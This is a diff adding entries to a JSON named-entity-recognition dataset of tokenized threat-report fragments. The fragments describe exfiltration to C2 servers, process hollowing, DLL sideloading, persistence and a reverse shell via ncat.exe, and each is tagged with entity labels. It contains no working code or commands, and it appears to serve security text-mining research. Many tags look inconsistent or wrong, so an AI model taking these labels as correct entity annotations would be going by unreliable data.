+ "lateral", + "movement." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lateral", + "tool", + "transfers", + "have", + "been", + "used", + "to", + "move", + "tools", + "and", + "files", + "from", + "one", + "compromised", + "system", + "to", + "another,", + "including", + "SMB", + "and", + "RDP." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "to", + "exfiltrate", + "data", + "to", + "external", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "exfiltrate", + "data", + "directly", + "to", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tools", + "such", + "as", + "SystemBC", + "and", + "proprietary", + "backdoors", + "are", + "known", + "to", + "be", + "used" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Legitimate", + "processes", + "have", + "been", + "corrupted", + "by", + "Vice", + "Society", + "via", + "code", + "injection,", + "as", + "a", + "means", + "to", + "evade", + "defenses." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malware", + "is", + "designed", + "to", + "steal", + "sensitive", + "information", + "from", + "victims'", + "systems," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "B-Purp", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attackers", + "used", + "an", + "innocent-looking", + "email", + "to", + "lure", + "victims", + "into", + "opening", + "an", + "attachment." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "we", + "found", + "the", + "original", + "email", + "that", + "included", + "a", + "ZIP", + "file", + "attached,", + "which", + "contained", + "an", + "ISO", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Tool", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sample", + "uses", + "obfuscation" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "file", + "is", + "an", + "obfuscated", + ".NET", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "only", + "uses", + "one", + "code", + "obfuscation", + "technique:", + "API", + "hashing." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Payload", + "Obfuscation" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "each", + "data", + "byte", + "in", + "the", + "HTTP", + "based", + "C2", + "communication," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "submitted", + "to", + "the", + "C2", + "server", + "through", + "HTTP", + "protocol", + "using", + "the", + "POST", + "method." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "HTTP", + "C2", + "Communication", + "section." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "C2", + "Communication" + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "to", + "the", + "C2", + "through", + "the", + "HTTP", + "protocol." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "can", + "be", + "found", + "in", + "the", + "two", + "bytes", + "of", + "the", + "HTTP", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "shows", + "a", + "HTTP", + "POST", + "request", + "and", + "its", + "corresponding", + "message", + "body." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "Content-Key,", + "which", + "is", + "a", + "custom", + "HTTP", + "header", + "whose", + "value", + "corresponds", + "to", + "a", + "hash", + "generated", + "out", + "of", + "the", + "HTTP", + "header." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "POST", + "request", + "(type", + "27", + "/", + "data", + "exfiltration)." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "uploads", + "this", + "information", + "to", + "an", + "attacker-controlled", + "machine", + "via", + "HTTP", + "POST." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "exfiltrates", + "information", + "to", + "the", + "C2", + "through", + "the", + "HTTP", + "protocol." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "HTTP", + "POST", + "request", + "(type", + "27", + "/", + "data", + "exfiltration)." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "ISO", + "file", + "opener", + "that", + "mounts", + "and", + "opens", + "the", + "file", + "with", + "a", + "simple", + "double-click." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "the", + "victim,", + "the", + "opening", + "process", + "simply", + "looks", + "like", + "a", + "regular", + "directory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + ".NET", + "file", + "using", + "process", + "hollowing,", + "which", + "is", + "a", + "code", + "injection", + "technique", + "in", + "which", + "an", + "attacker", + "removes", + "legitimate", + "code", + "from", + "an", + "executable", + "and", + "replaces", + "it", + "with", + "malicious", + "code." + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "process", + "hollowing", + "was", + "used", + "to", + "inject", + "a", + "malicious", + "PE", + "file", + "into", + "the", + "legitimate", + "process", + "called", + "aspnet_compiler.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "use", + "this", + "technique", + "to", + "retrieve", + "export", + "functions", + "from", + "loaded", + "libraries" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "corresponding", + "APIs", + "in", + "the", + "appropriate", + "library." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "via", + "the", + "MoveFileExW", + "or", + "CopyFileW", + "Windows", + "API." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Then,", + "it", + "creates", + "and", + "sets", + "a", + "new", + "value", + "for", + "the", + "registry", + "key", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "In", + "order", + "to", + "establish", + "persistence", + "on", + "the", + "targeted", + "host,", + "the", + "malware", + "starts", + "by", + "saving", + "a", + "copy", + "of", + "itself", + "in", + "a", + "new", + "folder", + "in", + "the", + "%APPDATA%", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "searches", + "for", + "and", + "exfiltrates", + "the", + "following", + "information:", + "OS", + "architecture", + "Built-in", + "admin", + "Domain", + "host", + "name", + "Hostname", + "Local", + "admin", + "Operating", + "system", + "Screen", + "resolution" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Username", + "information" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Exfiltrate", + "keylogger", + "data" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "Keylogger", + "database" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "use", + "additional", + "payload", + "types" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exfiltrate", + "screenshots" + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Potential", + "hidden", + "files" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "collects", + "sensitive", + "data", + "from", + "web", + "browsers," + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "functions", + "are", + "made", + "to", + "steal", + "credentials", + "from", + "different", + "types", + "of", + "applications", + "and", + "services", + "on", + "the", + "Windows", + "operating", + "system:", + "Browsers:", + "Safari,", + "Internet", + "Explorer,", + "Firefox", + "and", + "Chromium-based", + "browsers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "adopting", + "publicly", + "disclosed", + "proof-of-concept", + "(POC)", + "code", + "shortly", + "after", + "it", + "is", + "released", + "to", + "exploit", + "vulnerabilities", + "in", + "internet-facing", + "applications." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "their", + "initial", + "exploitation", + "of", + "vulnerable", + "internet-facing", + "applications," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "continues", + "to", + "use", + "older", + "vulnerabilities,", + "especially", + "Log4Shell,", + "to", + "compromise", + "unpatched", + "devices" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "gaining", + "initial", + "access", + "to", + "an", + "organization", + "by", + "exploiting", + "a", + "vulnerability", + "with", + "a", + "public", + "POC," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "as", + "several", + "adversaries", + "are", + "exploiting", + "CVE-2022-47966", + "for", + "initial", + "access.", + "Apache", + "Log4j2", + "(aka", + "Log4Shell)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "enable", + "RDP", + "connections." + ], + "ner_tags": [ + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "can", + "use", + "the", + "Active", + "Directory", + "database", + "to", + "access", + "credentials", + "for", + "users’", + "accounts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "credentials", + "are", + "accessed", + "and", + "the", + "target", + "organization", + "has", + "not", + "reset", + "corresponding", + "passwords,", + "the", + "actors", + "can", + "log", + "in", + "with", + "stolen", + "credentials", + "and", + "masquerade", + "as", + "legitimate", + "users," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "could", + "also", + "gain", + "access", + "to", + "other", + "systems", + "where", + "individuals", + "may", + "have", + "reused", + "their", + "passwords." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "persist", + "in", + "target", + "environments", + "and", + "deploy", + "additional", + "tools." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "backdoor", + "with", + "the", + "ability", + "to", + "download", + "and", + "run", + "additional", + "tools" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "create", + "scheduled", + "tasks", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scheduled", + "Task", + "Creation", + "or" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remote", + "Task", + "Creation/Update", + "using", + "Schtasks", + "Process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "the", + "group", + "crafts", + "bespoke", + "phishing", + "emails,", + "often", + "purporting", + "to", + "contain", + "information", + "on", + "security", + "policies", + "that", + "affect", + "countries", + "in", + "the", + "Middle", + "East,", + "to", + "deliver", + "weaponized", + "documents", + "to", + "individuals", + "of", + "interest." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "read", + "files," + ], + "ner_tags": [ + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "gather", + "information", + "on", + "an", + "infected", + "host,", + "and", + "send", + "details", + "back", + "to", + "the", + "attackers." + ], + "ner_tags": [ + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Commands", + "executed", + "by", + "WMI", + "on", + "new", + "hosts" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "script", + "to", + "deobfuscate", + "the", + "control", + "flow", + "of", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malware", + "immediately", + "decrypts", + "the", + "third", + "layer" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "decrypts", + "the", + "c2", + "URL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Use", + "NtQueryInformationProcess", + "API" + ], + "ner_tags": [ + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "It", + "decrypts", + "an", + "encrypted", + "payload," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Payload", + "decryption", + "function." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "the", + "payload", + "decryption", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deobfuscated", + "code", + "of", + "GuLoader’s", + "shellcode." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "using", + "stack", + "to", + "decrypt", + "strings" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "script", + "to", + "restore", + "deobfuscate", + "control", + "flow." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "control", + "flow", + "obfuscation" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "shellcode’s", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "payload", + "from", + "c2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "arithmetic", + "value", + "calculations" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "encrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "shellcode", + "control", + "flow", + "obfuscation" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "control", + "flow", + "obfuscation." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Unpacking", + "of", + "GuLoader’s", + "shellcodes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "packed", + "using", + "NSIS", + "installer." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "UNPACKING", + "GULOADER’S", + "SHELLCODE" + ], + "ner_tags": [ + "B-Idus", + "B-Idus", + "B-HackOrg" + ] + }, + { + "tokens": [ + "It", + "then", + "calls", + "CallWindowProcW", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "B-Tool" + ] + }, + { + "tokens": [ + "Uses", + "EnumWindows", + "API" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uses", + "EnumDeviceDrivers", + "and", + "GetDeviceDriverBaseNameA", + "APIs." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Uses", + "MsiEnumProductsA", + "and", + "MsiGetProductInfoA", + "APIs." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Uses", + "OpenSCManagerA", + "and", + "EnumServicesStatusA", + "APIs." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Uses", + "NtSetInformationThread", + "API" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "DbgBreakPoint", + "and", + "DbgUiRemoteBreakin", + "API" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "it", + "starts", + "payload", + "execution", + "using", + "the", + "ZwCreateThreadEx", + "API." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Tool" + ] + }, + { + "tokens": [ + "call", + "RtlAddVectoredExceptionHandler", + "API" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "This", + "shellcode", + "has", + "complex", + "obfuscation,", + "consisting", + "of", + "junk", + "code" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "dynamic", + "API", + "resolution" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "process", + "hollowing", + "to", + "inject", + "decrypted", + "payload", + "into", + "child", + "process", + "and", + "resolves", + "its", + "Import", + "Address", + "Table." + ], + "ner_tags": [ + "O", + "B-Tool", + "B-Tool", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DLL", + "sideloading," + ], + "ner_tags": [ + "B-SamFile", + "B-Features" + ] + }, + { + "tokens": [ + "program", + "first", + "sideloads", + "u2ec.dll,", + "which", + "then", + "loads", + "the", + "payload", + "file", + "usb.ini" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "malware", + "rzlog4cpp.dll", + "is", + "sideloaded" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "is", + "used", + "for", + "the", + "first", + "sideloading." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "including", + "the", + "use", + "of", + "DLL", + "sideloading" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "malicious", + "DLL", + "is", + "sideloaded,", + "it", + "will", + "drop", + "the", + "legitimate", + "EXE", + "file", + "and", + "the", + "malicious", + "DLL", + "file,", + "which", + "are", + "embedded", + "in", + "the", + "resource", + "section", + "of", + "the", + "DLL", + "file." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "First-stage", + "legitimate", + "executable", + "for", + "DLL", + "sideloading" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Second-stage", + "legitimate", + "executable", + "for", + "DLL", + "sideloading" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "files", + "have", + "XOR-encrypted", + "content", + "to", + "prevent", + "detection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contains", + "another", + "payload", + "that", + "is", + "XOR-encrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "applies", + "obfuscation", + "techniques" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reads", + "the", + "encrypted", + "configuration", + "filecan" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "encrypted", + "configuration." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "logging", + "strings", + "are", + "encrypted", + "with", + "a", + "single", + "byte", + "in", + "XOR", + "operations", + "as" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "obfuscation", + "mechanisms." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "increasing", + "number", + "of", + "obfuscations", + "are", + "being", + "adopted", + "to", + "thwart", + "static", + "analysis." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "containing", + "one-byte", + "XOR", + "encrypted", + "sections" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "will", + "decrypt", + "this", + "file", + "with", + "a", + "single", + "byte", + "in", + "XOR", + "operations,", + "find", + "the", + "PE", + "header,", + "and", + "drop", + "the", + "payload", + "to", + "the", + "specified", + "path." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "after", + "decrypting", + "the", + "frData", + "member", + "in" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decryption", + "function" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "will", + "then", + "decrypt", + "the", + "encrypted", + "payload", + "with", + "the", + "predefined", + "RC4", + "key" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "decryption,", + "it", + "then", + "checks", + "if", + "the", + "first", + "byte", + "of", + "the", + "decrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "this", + "is", + "decrypted," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "will", + "continue", + "to", + "read", + "and", + "decrypt", + "goopdate" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C&C", + "traffic", + "of", + "the", + "PUBLOAD", + "HTTP", + "variant" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "communicates", + "to", + "its", + "C&C", + "servers", + "over", + "the", + "MQTT", + "protocol,", + "which", + "is", + "commonly", + "used", + "in", + "internet-of-things", + "(IoT)", + "devices" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "malware", + "that", + "communicates", + "over", + "the", + "MQTT", + "protocol." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Command", + "codes", + "in", + "the", + "PUBLOAD", + "HTTP", + "variant" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "variant" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "variant" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "data", + "in", + "the", + "HTTP", + "body", + "is", + "the", + "same", + "as", + "the", + "past", + "variant," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "variant" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "supports", + "data", + "upload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "group", + "used", + "certutil.exe", + "to", + "download", + "the", + "legitimate", + "WinRAR", + "binary", + "as", + "rar1.exe", + "from", + "the", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "downloading", + "malware" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "B-SecTeam" + ] + }, + { + "tokens": [ + "The", + "certutil.exe", + "program", + "downloads", + "the", + "WinRAR", + "binary" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "used", + "PowerShell", + "to", + "download", + "multiple", + "malware", + "and", + "archives", + "from", + "the", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "command", + "execution." + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "its", + "shell", + "open", + "command." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "create", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "will", + "then", + "create", + "a", + "reverse", + "shell", + "via", + "ncat.exe", + "to", + "the", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "backdoor", + "that", + "is", + "capable", + "of", + "executing", + "commands" + ], 